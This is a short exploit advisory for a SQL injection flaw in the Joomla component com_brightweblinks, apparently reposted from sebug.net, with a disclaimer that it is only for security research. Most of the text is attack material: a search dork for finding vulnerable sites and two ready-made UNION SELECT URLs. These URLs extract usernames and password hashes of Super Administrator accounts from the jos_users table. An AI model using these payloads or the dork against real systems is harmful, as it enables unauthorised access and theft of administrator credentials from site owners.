Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability
发布时间(Published):2008-07-02
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
/---------------------------------------------------------------\
\ /
/ Joomla Component Brightcode Weblinks Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com__brightweblinks
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid=<valid_id> UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
[*] Example2 : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid=<valid_id> UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
----------------------------------------------------------------------------
[*] Greetings : All friends & muslims HaCkeRs...
[*] Greetings2: http://www.dz-secure.com
http://palcastle.org/cc
// Sebug.net [ 2008-07-03 ]